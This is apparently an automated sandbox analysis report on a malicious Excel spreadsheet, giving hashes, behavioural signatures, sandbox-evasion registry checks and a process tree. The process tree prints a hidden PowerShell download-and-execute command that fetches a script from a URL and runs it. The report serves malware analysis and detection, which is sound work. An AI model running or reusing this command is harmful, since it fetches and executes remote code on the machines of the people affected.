Analysis
max time kernel: 42s
max time network: 43s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03/11/2024, 21:03
Behavioral task behavioral1
Sample: ea2ca4b289651f3b3414469ad106954407822ae10ae2a4ff08d35dadbf1f5f09.xls
Resource: win7-20240903-en

Behavioral task behavioral2
Sample: ea2ca4b289651f3b3414469ad106954407822ae10ae2a4ff08d35dadbf1f5f09.xls
Resource: win10v2004-20241007-en
General
Target: ea2ca4b289651f3b3414469ad106954407822ae10ae2a4ff08d35dadbf1f5f09.xls
Size: 30KB
MD5: 347bea8e71a1fb34fe6c1f48cb77cef9
SHA1: 8c24139f35afccaa2260d05e98a5547fed710527
SHA256: ea2ca4b289651f3b3414469ad106954407822ae10ae2a4ff08d35dadbf1f5f09
SHA512: a62f5088f7f2fcb8006902f32e8086bde72c199ee905ffd884f88fc60f3815e1c05a33aeff748a6533404fe8536c1371255c65e61719fd1120365d4d7d1f804f
SSDEEP: 768:kK1Tgbyw3sz2jyngov9rjXjBCKTUAuulFFzqFVOp46msi:kK1Tgbyw3sz2jyngov9rjXjBCKoAuulQ
Malware Config
Extracted: http://127.0.0.1:8000/arquivos/windows.txt
Signatures

Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3952 | 2996 | powershell.exe | 83

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Run PowerShell and hide display window.
pid | Process
3952 | powershell.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
pid | Process
2996 | EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
3952 | powershell.exe
3952 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3952 | powershell.exe

Suspicious use of SetWindowsHookEx (14 IoCs)
pid | Process
2996 | EXCEL.EXE (14 identical entries)

Suspicious use of WriteProcessMemory (2 IoCs)
description | pid | Process | procid_target
PID 2996 wrote to memory of 3952 | 2996 | EXCEL.EXE | 87
PID 2996 wrote to memory of 3952 | 2996 | EXCEL.EXE | 87
Processes

1. C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
   Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ea2ca4b289651f3b3414469ad106954407822ae10ae2a4ff08d35dadbf1f5f09.xls"
   PID: 2996
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 2996)
   Command line: powershell.exe -w hidden -noninteractive "IEX((new-object net.webclient).downloadstring('http://127.0.0.1:8000/arquivos/windows.txt'))"
   PID: 3952
   - Process spawned unexpected child process
   - Command and Scripting Interpreter: PowerShell
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize: 686B
MD5: 07c7556a311061110771778bc27d790a
SHA1: 1626761f67f5796823d394fcfd3117a40f8053a6
SHA256: 98e3115dfe329d57803a967a7dccf4df08dbc343e560bcbe0bbdcfe2395b4966
SHA512: b667395a9b82f8a01ac09f85ca23ebc9f4a34b123145e1c18df202a760e5cc6613ee6566fd199a953604bdd91834cccc13ee985bd2d076136fb55511f90178ac